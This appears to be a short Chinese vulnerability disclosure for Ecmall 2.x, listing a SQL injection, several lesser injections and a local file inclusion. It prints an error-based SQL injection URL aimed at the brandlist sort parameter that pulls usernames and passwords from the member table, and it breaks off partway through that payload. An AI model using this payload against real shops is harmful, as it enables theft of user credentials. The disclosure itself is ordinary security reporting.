Ecmall 2.x 多处安全漏洞汇总

简要描述： 一处通杀注入，同文件多处鸡肋注入，一处本地包含。累了不看了，体力活。。。 详细说明： 通杀注入:http://localhost/ecmall/index.php?app=mygoods&act=brandlist&order=asc&sort=1 and select username from ecmmember where userid=1 union select 1 from select count,concatfloorrand02,select concatusername,password from ecmmember limit 0,1a from...